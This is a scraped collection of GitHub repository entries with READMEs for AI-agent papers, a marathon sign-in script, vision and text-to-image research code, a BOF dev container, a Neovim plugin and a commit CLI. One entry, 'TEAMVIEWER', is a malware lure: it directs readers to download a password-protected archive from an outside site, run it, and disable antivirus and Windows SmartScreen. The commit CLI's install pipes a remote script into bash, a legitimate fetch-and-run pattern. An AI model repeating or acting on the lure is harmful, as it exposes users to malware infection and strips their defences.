2023.5 51. **Making Language Models Better Tool Learners with Execution Feedback.** Arxiv *Shuofei Qiao, Honghao Gui, Huajun Chen, Ningyu Zhang* [[pdf](https://arxiv.org/abs/2305.13068)], 2023.5 52. **Hierarchical Prompting Assists Large Language Model on Web Navigation.** ACL 2023 NLRSE workshop *Abishek Sridhar, Robert Lo, Frank F. Xu, Hao Zhu, Shuyan Zhou* [[pdf](https://arxiv.org/abs/2305.14257)], 2023.5 53. **PEARL: Prompting Large Language Models to Plan and Execute Actions Over Long Documents.** Arxiv *Simeng Sun, Yang Liu, Shuohang Wang, Chenguang Zhu, Mohit Iyyer* [[pdf](https://arxiv.org/abs/2305.14564)], 2023.5 54. **ReWOO: Decoupling Reasoning from Observations for Efficient Augmented Language Models.** Arxiv *Binfeng Xu, Zhiyuan Peng, Bowen Lei, Subhabrata Mukherjee, Yuchen Liu, Dongkuan Xu* [[pdf](https://arxiv.org/abs/2305.18323)], 2023.5 55. **Gorilla: Large Language Model Connected with Massive APIs.** Arxiv *Shishir G. Patil, Tianjun Zhang, Xin Wang, Joseph E. Gonzalez* [[pdf](https://arxiv.org/abs/2305.15334)], 2023.5 56. **SPRING: GPT-4 Out-performs RL Algorithms by Studying Papers and Reasoning.** Arxiv *Yue Wu, Shrimai Prabhumoye, So Yeon Min, Yonatan Bisk, Ruslan Salakhutdinov, Amos Azaria, Tom Mitchell, Yuanzhi Li* [[pdf](https://arxiv.org/abs/2305.15486)], 2023.5 57. **Leveraging Pre-trained Large Language Models to Construct and Utilize World Models for Model-based Task Planning.** Arxiv *Lin Guan, Karthik Valmeekam, Sarath Sreedharan, Subbarao Kambhampati* [[pdf](https://arxiv.org/abs/2305.14909)], 2023.5 58. **EmbodiedGPT: Vision-Language Pre-Training via Embodied Chain of Thought** Arxiv *Yao Mu, Qinglong Zhang, Mengkang Hu, Wenhai Wang, Mingyu Ding, Jun Jin, Bin Wang, Jifeng Dai, Yu Qiao, Ping Luo* [[pdf](https://arxiv.org/abs/2305.15021)], 2023.5 59. **On the Tool Manipulation Capability of Open-source Large Language Models.** Arxiv *Qiantong Xu, Fenglu Hong, Bo Li, Changran Hu, Zhengyu Chen, Jian Zhang* [[pdf](https://arxiv.org/abs/2305.16504)], 2023.5 60. **Voyager: An Open-Ended Embodied Agent with Large Language Models.** Arxiv *Guanzhi Wang, Yuqi Xie, Yunfan Jiang, Ajay Mandlekar, Chaowei Xiao, Yuke Zhu, Linxi Fan, Anima Anandkumar* [[pdf](https://arxiv.org/abs/2305.16291)], 2023.5 61. **Mindstorms in Natural Language-Based Societies of Mind** Arxiv *Mingchen Zhuge, Haozhe Liu, Francesco Faccio, Dylan R. Ashley, Róbert Csordás, Anand Gopalakrishnan, Abdullah Hamdi, Hasan Abed Al Kader Hammoud, Vincent Herrmann, Kazuki Irie, Louis Kirsch, Bing Li, Guohao Li, Shuming Liu, Jinjie Mai, Piotr Piękos, Aditya Ramesh, Imanol Schlag, Weimin Shi, Aleksandar Stanić, Wenyi Wang, Yuhui Wang, Mengmeng Xu, Deng-Ping Fan, Bernard Ghanem, Jürgen Schmidhuber* [[pdf](https://arxiv.org/abs/2305.17066)], 2023.5 62. **Large Language Models as Tool Makers.** Arxiv *Tianle Cai, Xuezhi Wang, Tengyu Ma, Xinyun Chen, Denny Zhou* [[pdf](https://arxiv.org/abs/2305.17126)], 2023.5 63. **GPT4Tools: Teaching Large Language Model to Use Tools via Self-instruction.** Arxiv *Rui Yang, Lin Song, Yanwei Li, Sijie Zhao, Yixiao Ge, Xiu Li, Ying Shan* [[pdf](https://arxiv.org/abs/2305.18752)], 2023.5 64. **SheetCopilot: Bringing Software Productivity to the Next Level through Large Language Models.** Arxiv *Hongxin Li, Jingran Su, Yuntao Chen, Qing Li, Zhaoxiang Zhang* [[pdf](https://arxiv.org/abs/2305.19308)], 2023.5 65. **CREATOR: Disentangling Abstract and Concrete Reasonings of Large Language Models through Tool Creation.** Arxiv *Cheng Qian, Chi Han, Yi R. Fung, Yujia Qin, Zhiyuan Liu, Heng Ji* [[pdf](https://arxiv.org/abs/2305.14318)], 2023.5 66. **SQL-PaLM: Improved Large Language ModelAdaptation for Text-to-SQL.** Arxiv *Ruoxi Sun, Sercan O. Arik, Hootan Nakhost, Hanjun Dai, Rajarishi Sinha, Pengcheng Yin, Tomas Pfister* [[pdf](https://arxiv.org/abs/2306.00739)], 2023.6 67. **From Pixels to UI Actions: Learning to Follow Instructions via Graphical User Interfaces.** Arxiv *Peter Shaw, Mandar Joshi, James Cohan, Jonathan Berant, Panupong Pasupat, Hexiang Hu, Urvashi Khandelwal, Kenton Lee, Kristina Toutanova* [[pdf](https://arxiv.org/abs/2306.00245)], 2023.6 68. **Modular Visual Question Answering via Code Generation.** ACL 2023 *Sanjay Subramanian, Medhini Narasimhan, Kushal Khangaonkar, Kevin Yang, Arsha Nagrani, Cordelia Schmid, Andy Zeng, Trevor Darrell, Dan Klein* [[pdf](https://arxiv.org/abs/2306.05392)], 2023.6 69. **ToolAlpaca: Generalized Tool Learning for Language Models with 3000 Simulated Cases.** Arxiv *Qiaoyu Tang, Ziliang Deng, Hongyu Lin, Xianpei Han, Qiao Liang, Le Sun* [[pdf](https://arxiv.org/abs/2306.05301)], 2023.6 70. **Embodied Executable Policy Learning with Language-based Scene Summarization** Arxiv *Jielin Qiu, Mengdi Xu, William Han, Seungwhan Moon, Ding Zhao* [[pdf](https://arxiv.org/abs/2306.05696)], 2023.6 71. **Mind2Web: Towards a Generalist Agent for the Web.** Arxiv *Xiang Deng, Yu Gu, Boyuan Zheng, Shijie Chen, Samuel Stevens, Boshi Wang, Huan Sun, Yu Su* [[pdf](https://arxiv.org/abs/2306.06070)], 2023.6 72. **Can Language Models Teach Weaker Agents? Teacher Explanations Improve Students via Theory of Mind.** Arxiv *Swarnadeep Saha, Peter Hase, Mohit Bansal* [[pdf](https://arxiv.org/abs/2306.09299)], 2023.6 73. **Generating Language Corrections for Teaching Physical Control Tasks** ICML 2023 *Megha Srivastava, Noah Goodman, Dorsa Sadigh* [[pdf](https://arxiv.org/abs/2306.07012)], 2023.6 74. **Data-Copilot: Bridging Billions of Data and Humans with Autonomous Workflow.** Arxiv *Wenqi Zhang, Yongliang Shen, Weiming Lu, Yueting Zhuang* [[pdf](https://arxiv.org/abs/2306.07209)], 2023.6 75. **SayTap: Language to Quadrupedal Locomotion** Arxiv *Yujin Tang, Wenhao Yu, Jie Tan, Heiga Zen, Aleksandra Faust, Tatsuya Harada* [[pdf](https://arxiv.org/abs/2306.07580)], 2023.6 76. **Language to Rewards for Robotic Skill Synthesis** Arxiv *Wenhao Yu, Nimrod Gileadi, Chuyuan Fu, Sean Kirmani, Kuang-Huei Lee, Montse Gonzalez Arenas, Hao-Tien Lewis Chiang, Tom Erez, Leonard Hasenclever, Jan Humplik, Brian Ichter, Ted Xiao, Peng Xu, Andy Zeng, Tingnan Zhang, Nicolas Heess, Dorsa Sadigh, Jie Tan, Yuval Tassa, Fei Xia* [[pdf](https://arxiv.org/abs/2306.08647)], 2023.6 77. **REFLECT: Summarizing Robot Experiences for Failure Explanation and Correction** Arxiv *Zeyi Liu, Arpit Bahety, Shuran Song* [[pdf](https://arxiv.org/abs/2306.15724)], 2023.6 78. **ChatGPT for Robotics: Design Principles and Model Abilities** Arxiv *Sai Vemprala, Rogerio Bonatti, Arthur Bucker, Ashish Kapoor* [[pdf](https://arxiv.org/abs//2306.17582)], 2023.6 79. **Robots That Ask For Help: Uncertainty Alignment for Large Language Model Planners** Arxiv *Allen Z. Ren, Anushri Dixit, Alexandra Bodrova, Sumeet Singh, Stephen Tu, Noah Brown, Peng Xu, Leila Takayama, Fei Xia, Jake Varley, Zhenjia Xu, Dorsa Sadigh, Andy Zeng, Anirudha Majumdar* [[pdf](https://arxiv.org/abs/2307.01928)], 2023.7 80. **Building Cooperative Embodied Agents Modularly with Large Language Models** Arxiv *Hongxin Zhang, Weihua Du, Jiaming Shan, Qinhong Zhou, Yilun Du, Joshua B. Tenenbaum, Tianmin Shu, Chuang Gan* [[pdf](https://arxiv.org/abs/2307.02485)], 2023.7 81. **VoxPoser: Composable 3D Value Maps for Robotic Manipulation with Language Models** Arxiv *Wenlong Huang, Chen Wang, Ruohan Zhang, Yunzhu Li, Jiajun Wu, Li Fei-Fei* [[pdf](https://arxiv.org/abs/2307.05973)], 2023.7 82. **Demonstrating Large Language Models on Robots** RSS 2023 Demo Track *Google DeepMind* [[pdf](https://roboticsconference.org/program/papers/024)], 2023.7 83. **GenSim: Generative Models for Supersizing Robotic Simulation Tasks** Github *Lirui Wang* [[pdf](https://github.com/liruiw/GenSim)], 2023.7 84. **Large Language Models as General Pattern Machines** Arxiv *Suvir Mirchandani, Fei Xia, Pete Florence, Brian Ichter, Danny Driess, Montserrat Gonzalez Arenas, Kanishka Rao, Dorsa Sadigh, Andy Zeng* [[pdf](https://arxiv.org/abs/2307.04721)], 2023.7 85. **SayPlan: Grounding Large Language Models using 3D Scene Graphs for Scalable Task Planning** Arxiv *Krishan Rana, Jesse Haviland, Sourav Garg, Jad Abou-Chakra, Ian Reid, Niko Suenderhauf* [[pdf](https://arxiv.org/abs/2307.06135)], 2023.7 86. **RoCo: Dialectic Multi-Robot Collaboration with Large Language Models** Arxiv *Zhao Mandi, Shreeya Jain, Shuran Song* [[pdf](https://arxiv.org/abs/2307.04738)], 2023.7 87. **A Real-World WebAgent with Planning, Long Context Understanding, and Program Synthesis** Arxiv *Izzeddin Gur, Hiroki Furuta, Austin Huang, Mustafa Safdari, Yutaka Matsuo, Douglas Eck, Aleksandra Faust* [[pdf](https://arxiv.org/abs/2307.12856)], 2023.7 88. **WebArena: A Realistic Web Environment for Building Autonomous Agents** Arxiv *Shuyan Zhou, Frank F. Xu, Hao Zh+, Xuhui Zhou, Robert Lo, Abishek Sridhar, Xianyi Cheng, Yonatan Bisk, Daniel Fried, Uri Alon, Graham Neubig* [[pdf](https://webarena.dev/static/paper.pdf)], 2023.7 89. **RT-2: Vision-Language-Action Models Transfer Web Knowledge to Robotic Control** Arxiv *Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Xi Chen, Krzysztof Choromanski, Tianli Ding, Danny Driess, Avinava Dubey, Chelsea Finn, Pete Florence, Chuyuan Fu, Montse Gonzalez Arenas, Keerthana Gopalakrishnan, Kehang Han, Karol Hausman, Alexander Herzog, Jasmine Hsu, Brian Ichter, Alex Irpan, Nikhil Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Isabel Leal, Lisa Lee, Tsang-Wei Edward Lee, Sergey Levine, Yao Lu, Henryk Michalewski, Igor Mordatch, Karl Pertsch, Kanishka Rao, Krista Reymann, Michael Ryoo, Grecia Salazar, Pannag Sanketi, Pierre Sermanet, Jaspiar Singh, Anikait Singh, Radu Soricut, Huong Tran, Vincent Vanhoucke, Quan Vuong, Ayzaan Wahid, Stefan Welker, Paul Wohlhart, Jialin Wu, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Tianhe Yu, Brianna Zitkovich* [[pdf](https://robotics-transformer2.github.io/assets/rt2.pdf)], 2023.7 90. **Scaling Up and Distilling Down: Language-Guided Robot Skill Acquisition** Arxiv *Huy Ha, Pete Florence, Shuran Song* [[pdf](https://arxiv.org/abs/2307.14535)], 2023.7 91. **ToolLLM: Facilitating Large Language Models to Master 16000+ Real-world APIs** Arxiv *Yujia Qin, Shihao Liang, Yining Ye, Kunlun Zhu, Lan Yan, Yaxi Lu, Yankai Lin, Xin Cong, Xiangru Tang, Bill Qian, Sihan Zhao, Runchu Tian, Ruobing Xie, Jie Zhou, Mark Gerstein, Dahai Li, Zhiyuan Liu, Maosong Sun* [[pdf](https://arxiv.org/abs/2307.16789)], 2023.7
124
3
zhaohongxuan/shangma_auto_sign
https://github.com/zhaohongxuan/shangma_auto_sign
基于Nodejs和Github Action实现上马每日自动签到
## 上马自动签到 [![Run Auto Sign](https://github.com/zhaohongxuan/shangma_auto_sign/actions/workflows/auto-sign.yaml/badge.svg)](https://github.com/zhaohongxuan/shangma_auto_sign/actions/workflows/auto-sign.yaml) ### 基于 Node.js + GitHub Action 实现上海马拉松官网每日签到 作为上马9年没中签的受害者,我决定做一个`自动化脚本`来签到赚积分,虽然积分对于抽签的权重未可知,但是已知的是一定有用,至于作用多大? 且看后续的上马抽签结果吧·· ### 关于Job执行时间 签到Job执行时间是**UTC时间0点**,也就是**北京时间8点**执行,**不过由于GitHub的负载比较重**,真正签到时间可能延后一段时间,一般是几十分钟,这个延迟时间取决于GitHub Action的负载。 ### Use 使用 1. Fork本项目(顺手点Star以示鼓励~🥳) 2. 在Repo的Setting页面,添加名为上马官网的用户名:`SM_USERNAME`和密码:`SM_PASSWORD`的Secret 3. 手动测试运行 <img width="1444" alt="image" src="https://github.com/zhaohongxuan/shangma_auto_sign/assets/8613196/695683c9-fbc2-4cab-9ef8-41e2ddf59b78"> 在控制台应该能看到 `签到成功/请勿重复签到` 的提示 <img width="990" alt="image" src="https://github.com/zhaohongxuan/shangma_auto_sign/assets/8613196/399e89f7-2ad6-486e-9e67-8953564ec528"> ### 申明 - 本项目仅做学习交流, 禁止用于各种非法途径
20
37
elisezhu123/bilibili_sourcelibrary
https://github.com/elisezhu123/bilibili_sourcelibrary
null
# bilibili_sourcelibrary
10
0
wudongming97/OnlineRefer
https://github.com/wudongming97/OnlineRefer
[ICCV 2023] OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation
<div align="center"> <h1> <b> OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation </b> </h1> </div> <p align="center"><img src="docs/onlinerefer.jpg" width="800"/></p> > **[OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation](https://arxiv.org/abs/2307.09356)** > > Dongming Wu, Tiancai Wang, Yuang Zhang, Xiangyu Zhang, Jianbing Shen ### Abstract Referring video object segmentation (RVOS) aims at segmenting an object in a video following human instruction. Current state-of-the-art methods fall into an offline pattern, in which each clip independently interacts with text embedding for cross-modal understanding. They usually present that the offline pattern is necessary for RVOS, yet model limited temporal association within each clip. In this work, we break up the previous offline belief and propose a simple yet effective online model using explicit query propagation, named OnlineRefer. Specifically, our approach leverages target cues that gather semantic information and position prior to improve the accuracy and ease of referring predictions for the current frame. Furthermore, we generalize our online model into a semi-online framework to be compatible with video-based backbones. To show the effectiveness of our method, we evaluate it on four benchmarks, \ie, Refer-Youtube-VOS, Refer-DAVIS17, A2D-Sentences, and JHMDB-Sentences. Without bells and whistles, our OnlineRefer with a Swin-L backbone achieves 63.5 J&F and 64.8 J&F on Refer-Youtube-VOS and Refer-DAVIS17, outperforming all other offline methods. ## Update - **(2023/07/18)** OnlineRefer is accepted by ICCV2023. The online mode is released. ## Setup The main setup of our code follows [Referformer](https://github.com/wjn922/ReferFormer). Please refer to [install.md](docs/install.md) for installation. Please refer to [data.md](docs/data.md) for data preparation. ## Training and Evaluation If you want to train and evaluate our online model on Ref-Youtube-VOS using backbone **ResNet50**, please run the following command: ``` sh ./scripts/online_ytvos_r50.sh ``` If you want to train and evaluate our online model on Ref-Youtube-VOS using backbone **Swin-L**, please run the following command: ``` sh ./scripts/online_ytvos_swinl.sh ``` Note: The models with ResNet50 are trained using 8 NVIDIA 2080Ti GPU, and the models with Swin-L are trained using 8 NVIDIA Tesla V100 GPU. ## Model Zoo ### Ref-Youtube-VOS Please upload the zip file to the [competition server](https://competitions.codalab.org/competitions/29139#participate-submit_results). | Backbone| J&F | J | F | Pretrain | Model | Submission | | :----: |:-----:|:-----:|:----:|:------------------------------------------------------------------------------------------------------:|:----------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:| | ResNet-50 | 57.3 | 55.6 | 58.9 | [weight](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/r50_pretrained.pth) | [model](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/ytvos-r50-checkpoint.pth) | [link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/ResNet50_Submission.zip) | | Swin-L | 63.5 | 61.6 | 65.5 | [weight](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/swin_large_pretrained.pth) | [model](https://drive.google.com/file/d/1wTEf5Z-EmmtPJkWaUPFDpcRg8vuCsV2X/view?usp=sharing) | [link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/SwinL_Submission.zip) | | Video Swin-B | 62.9 | 61.0 | 64.7 | - | - |[link](https://github.com/wudongming97/OnlineRefer/releases/download/v1.0/VideoSwinB_Submission.zip) | ### Ref-DAVIS17 As described in the paper, we report the results using the model trained on Ref-Youtube-VOS without finetune. | Backbone | J&F | J | F | Model | |:------------:|:----:|:----:|:----:|:------------------------------------------------------------------------------------------------:| | ResNet-50 | 59.3 | 55.7 | 62.9 | [model](https://github.com/wudongming97/OnlineRefer/releases/edit/v1.0/ytvos-r50-checkpoint.pth) | | Swin-L | 64.8 | 61.6 | 67.7 | [model](https://drive.google.com/file/d/1wTEf5Z-EmmtPJkWaUPFDpcRg8vuCsV2X/view?usp=sharing) | [//]: # (## Visualizations) [//]: # (- Ref-DAVIS17) [//]: # () [//]: # (<img src="docs/davis_demo1.gif" width="400"/><img src="docs/davis_demo2.gif" width="400"/>) [//]: # () [//]: # (- Ref-Youtube-VOS) [//]: # () [//]: # (<img src="docs/ytvos_demo1.gif" width="400"/><img src="docs/ytvos_demo2.gif" width="400"/>) [//]: # (- Testing on long videos &#40;selected from Youtube-VIS 2021&#41;) ## Acknowledgement - [Deformable DETR](https://github.com/fundamentalvision/Deformable-DETR) - [ReferFormer](https://github.com/wjn922/ReferFormer) - [MTTR](https://github.com/mttr2021/MTTR) - [MOTR](https://github.com/megvii-research/MOTR) ## Citation If you find OnlineRefer useful in your research, please consider citing: ``` @article{wu2023onlinerefer, title={OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation}, author={Wu, Dongming and Wang, Tiancai and Zhang, Yuang and Zhang, Xiangyu and Shen, Jianbing}, journal={arXiv preprint arXiv:2307.09356}, year={2023} } ```
23
2
Karine-Huang/T2I-CompBench
https://github.com/Karine-Huang/T2I-CompBench
null
# T2I-CompBench: A Comprehensive Benchmark for Open-world Compositional Text-to-image Generation Kaiyi Huang<sup>1</sup>, Kaiyue Sun<sup>1</sup>, Enze Xie<sup>2</sup>, Zhenguo Li<sup>2</sup>, and Xihui Liu<sup>1</sup>. **<sup>1</sup>The University of Hong Kong, <sup>2</sup>Huawei Noah’s Ark Lab** <a href=' https://karine-h.github.io/T2I-CompBench/'><img src='https://img.shields.io/badge/Project-Page-Green'></a> <a href='https://arxiv.org/pdf/2307.06350.pdf'><img src='https://img.shields.io/badge/Paper-Arxiv-red'></a> ### Installing the dependencies Before running the scripts, make sure to install the library's training dependencies: **Important** To make sure you can successfully run the latest versions of the example scripts, we highly recommend **installing from source** and keeping the install up to date as we update the example scripts frequently and install some example-specific requirements. To do this, execute the following steps in a new virtual environment: ```bash git clone https://github.com/huggingface/diffusers cd diffusers pip install . ``` Then cd in the example folder and run ```bash pip install -r requirements.txt ``` And initialize an [🤗Accelerate](https://github.com/huggingface/accelerate/) environment with: ```bash accelerate config ``` ### Finetuning 1. LoRA finetuning Use LoRA finetuning method, please refer to the link for downloading "lora_diffusion" directory: ``` https://github.com/cloneofsimo/lora/tree/master ``` 2. Example usage ``` export project_dir=/T2I-CompBench cd $project_dir export train_data_dir="examples/samples/" export output_dir="examples/output/" export reward_root="examples/reward/" export dataset_root="examples/dataset/color.txt" export script=GORS_finetune/train_text_to_image.py accelerate launch --multi_gpu --mixed_precision=fp16 \ --num_processes=8 --num_machines=1 \ --dynamo_backend=no "${script}" \ --train_data_dir="${train_data_dir}" \ --output_dir="${output_dir}" \ --reward_root="${reward_root}" \ --dataset_root="${dataset_root}" ``` or run ``` cd T2I-CompBench bash GORS_finetune/train.sh ``` The image directory should be a directory containing the images, e.g., ``` examples/samples/ ├── a green bench and a blue bowl_000000.png ├── a green bench and a blue bowl_000001.png └──... ``` The reward directory should include a json file named "vqa_result.json", and the json file should be a dictionary that maps from `{"question_id", "answer"}`, e.g., ``` [{"question_id": 0, "answer": "0.7110"}, {"question_id": 1, "answer": "0.7110"}, ...] ``` The dataset should be placed in the directory "examples/dataset/". ### Evaluation 1. Install the requirements MiniGPT4 is based on the repository, please refer to the link for environment dependencies and weights: ``` https://github.com/Vision-CAIR/MiniGPT-4 ``` 2. Example usage For evaluation, the input images files are stored in the directory "examples/samples/", with the format the same as the training data. #### BLIP-VQA: ``` export project_dir="BLIPvqa_eval/" cd $project_dir out_dir="examples/" python BLIP_vqa.py --out_dir=$out_dir ``` or run ``` cd T2I-CompBench bash BLIPvqa_eval/test.sh ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_blip/" directory. #### UniDet: download weight and put under repo experts/expert_weights: ``` mkdir -p UniDet_eval/experts/expert_weights cd UniDet_eval/experts/expert_weights wget https://huggingface.co/shikunl/prismer/resolve/main/expert_weights/Unified_learned_OCIM_RS200_6x%2B2x.pth ``` ``` export project_dir=UniDet_eval cd $project_dir python determine_position_for_eval.py ``` The output files are formatted as a json file named "vqa_result.json" in "examples/labels/annotation_obj_detection" directory. #### CLIPScore: ``` outpath="examples/" python CLIPScore_eval/CLIP_similarity.py --outpath=${outpath} ``` or run ``` cd T2I-CompBench bash CLIPScore_eval/test.sh ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_clip" directory. #### 3-in-1: ``` export project_dir="3_in_1_eval/" cd $project_dir outpath="examples/" data_path="examples/dataset/" python "3_in_1.py" --outpath=${outpath} --data_path=${data_path} ``` The output files are formatted as a json file named "vqa_result.json" in "examples/annotation_3_in_1" directory. #### MiniGPT4-CoT: If the category to be evaluated is one of color, shape and texture: ``` export project_dir=Minigpt4_CoT_eval cd $project_dir category="color" img_file="examples/samples/" output_path="examples/" python mGPT_cot_attribute.py --category=${category} --img_file=${img_file} --output_path=${output_path} ``` If the category to be evaluated is one of spatial, non-spatial and complex: ``` export project_dir=MiniGPT4_CoT_eval/ cd $project_dir category="non-spatial" img_file="examples/samples/" output_path="examples" python mGPT_cot_general.py --category=${category} --img_file=${img_file} --output_path=${output_path} ``` The output files are formatted as a csv file named "mGPT_cot_output.csv" in output_path. ### Inference Run the inference.py. ``` export pretrained_model_path="checkpoint/color/lora_weight.pt" export prompt="A bathroom with green tile and a red shower curtain" python inference.py --pretrained_model_path "${pretrained_model_path}" --prompt "${prompt}" ``` ### Citation If you're using T2I-CompBench in your research or applications, please cite using this BibTeX: ```bibtex @article{huang2023t2icompbench, title={T2I-CompBench: A Comprehensive Benchmark for Open-world Compositional Text-to-image Generation}, author={Kaiyi Huang and Kaiyue Sun and Enze Xie and Zhenguo Li and Xihui Liu}, journal={arXiv preprint arXiv:2307.06350}, year={2023}, } ``` ### License This project is licensed under the MIT License. See the "License.txt" file for details.
26
1
MarinaGV93/TEAMVIEWER
https://github.com/MarinaGV93/TEAMVIEWER
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
28
0
vaishnavikotkar2004/Stack-Programs
https://github.com/vaishnavikotkar2004/Stack-Programs
Is in the quetions file....
# Stack-Programs
10
0
curated-intel/Threat-Actor-Profile-Guide
https://github.com/curated-intel/Threat-Actor-Profile-Guide
The Threat Actor Profile Guide for CTI Analysts
## 🔗 [The Threat Actor Profile Guide for CTI Analysts PDF](https://github.com/curated-intel/Threat-Actor-Profile-Guide/blob/main/The%20Threat%20Actor%20Profile%20Guide%20for%20CTI%20Analysts%20v1.1.pdf) ![image](https://github.com/curated-intel/Threat-Actor-Profile-Guide/assets/59974887/964427de-fbdb-460f-b5d5-4a8be10424bb)
53
4
EspressoCake/BOF_Development_Docker
https://github.com/EspressoCake/BOF_Development_Docker
A VSCode devcontainer for development of COFF files with batteries included.
# BOF_Development_Docker ## Summary This repository serves as a fully functional, **lightweight** template for developing and compiling `BOF` or otherwise `Windows`-centric applications via `Visual Studio Code`. ## Why `Visual Studio Code` has supported idempotent, purpose-built containers for development for a few years. This is meant to illustrate on how powerful this is, namely: - Remote installation of extension configurations - Reliable `Intellisense` for development using path inspection - Quick, reliable, readily deployable images for rapid development - Lack of configuration drift between traditional virtual machine IDEs ## How Opening this folder within `Visual Studio`, you will be prompted to reopen within a container. Acknowledging this (and assuming you have the [Docker VSCode extension](https://code.visualstudio.com/docs/containers/overview), and `Docker` already installed) will reload the current window to be *inside* of the container it has built for you. That's it. Happy hacking. ## Elections and Benefits I'm currently using `musl` as the set of header files/libraries/compiler options. This plays a *lot* nicer with the numerous hacks of function pointers leveraged within many popular projects, to include reflective loaders of choice. We're running on a slim `Alpine` image due to its size and first-class support of `musl` natively. This is just one less headache, and we can leave the "kitchen sink" bloat of other images. The configuration of the extensions is already done for you, so `Intellisense` among other things (such as peeking definitions) is a single right-click away.
41
1
lewis6991/whatthejump.nvim
https://github.com/lewis6991/whatthejump.nvim
Show jumplist in a floating window.
# whatthejump.nvim Show jump locations in a floating window. https://github.com/lewis6991/whatthejump.nvim/assets/7904185/13cb71f4-57e1-4f8f-916f-b6c616d36480 ## Usage If no keymaps already exist, ones we will be automatically created for `<C-i>` and `<C-o>`. Otherwise, if you use custom keymaps for jumping then use the following: ```lua -- Jump backwards vim.keymap.set('n', '<M-k>', function() require 'whatthejump'.show_jumps(false) return '<C-o>' end, {expr = true}) -- Jump forwards vim.keymap.set('n', '<M-j>', function() require 'whatthejump'.show_jumps(true) return '<C-i>' end, {expr = true}) ```
19
0
AllanCapistrano/gbc
https://github.com/AllanCapistrano/gbc
Git Better Commit (gbc) is a simple CLI in Go for writing better commits.
<h1 align="center">Git Better Commit</h1> <p align="center"> <img src="./data/screenshots/gbc-v110-execution.gif" alt="gbc v1.1.0 execution"> </p> <details> <summary>With emojis</summary> <p align="center"> <img src="./data/screenshots/gbc-v110-execution-emojis.gif" alt="gbc v1.1.0 execution with emojis"> </p> </details> ------------ ## :book: Description ## **Git Better Commit (gbc) is a command line interface written in Golang that provides a simple way to write commits following the [Conventional Commits](https://www.conventionalcommits.org/).** ------------ ## :computer: How to use <details open> <summary><h3>Install gbc</h3></summary> Follow the next steps to install **gbc**: 1. Make sure you already have [curl](https://curl.se/) installed on your machine; 2. Paste this command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/install.sh)" ``` 3. You can check if **gbc** is installed by typing `gbc --version` in your terminal. </details> <details> <summary><h3>Install gbc for Termux</h3></summary> Follow the next steps to install **gbc** for [Termux](https://termux.dev/en/): 1. Make sure you already have [curl](https://curl.se/) installed; 2. Paste this command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/install-termux.sh)" ``` 3. You can check if **gbc** is installed by typing `gbc --version` in your terminal. </details> <details> <summary><h3>Using gbc</h3></summary> Once you have **gbc** installed, after adding the file(s) to commit, type `gbc` in your terminal, select the **commit type** using the **arrows keys**, and press **enter**. After that, enter the **commit message** you want. You can type `gbc --help` to see the allowed command options or `gbc help <commit type>` to see a short description and basic example of each **commit type**. </details> <details> <summary><h3>Changing the defaults emojis</h3></summary> You can change the emojis in the `gbc.conf` file, available in `$HOME/.config/gbc`. Just change the `emojis = {...}`. Note that you need to use Emojis Shortcodes, you can get them in [Emoji Picker](https://github-emoji-picker.rickstaa.dev/). ###### Make sure to follow the formatting, otherwise the change will not be applied. ###### </details> <details> <summary><h3>Allowing commits messages with emojis</h3></summary> You can allow **commit messages with emojis** in the `gbc.conf` file, available in `$HOME/.config/gbc`. Just change the `enableEmojis` to `true`. ###### Make sure to follow the formatting, otherwise the change will not be applied. ###### The result will be something like: ```powershell 🐛 fix: updateUser method ``` </details> <details> <summary><h3>Build gbc</h3></summary> To build **gbc** in your machine, you can follow the next steps: 1. Make sure you already have [Go](https://go.dev/) installed; 2. Clone this repository or download the `.zip` file; 3. Open the project directory in your terminal; 4. Install the dependencies: ```powershell go mod download ``` or ```powershell go mod tidy ``` 5. Then build the project: ```powershell go build -o bin/gbc main.go ``` If you get [`GLIBC not found`](https://github.com/AllanCapistrano/gbc/issues/13) error, try: ```powershell CGO_ENABLED=0 go build -o bin/gbc main.go ``` To use the settings file: 1. Create the **gbc** config directory: ```powershell mkdir -p $HOME/.config/gbc ``` 2. Move the `gbc.conf` file into the configuration directory:: ```powershell mv ./config/gbc.conf $HOME/.config/gbc ``` </details> <details> <summary><h3>Uninstall gbc</h3></summary> To uninstall **gbc** run the following command in your terminal: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/uninstall.sh)" ``` </details> <details> <summary><h3>Uninstall gbc from Termux</h3></summary> To uninstall **gbc** from [Termux](https://termux.dev/en/) run the following command: ```powershell bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/AllanCapistrano/gbc/main/scripts/uninstall-termux.sh)" ``` </details> ------------ ## :man_technologist: Author ## | [![Allan Capistrano](https://github.com/AllanCapistrano.png?size=100)](https://github.com/AllanCapistrano) | | -----------------------------------------------------------------------------------------------------------| | [Allan Capistrano](https://github.com/AllanCapistrano) | <p> <h3>My socials:</h3> <a href="https://github.com/AllanCapistrano"> <img src="https://github.com/AllanCapistrano/AllanCapistrano/blob/master/assets/github-square-brands.png" alt="Github icon" width="5%"> </a> &nbsp <a href="https://www.linkedin.com/in/allancapistrano/"> <img 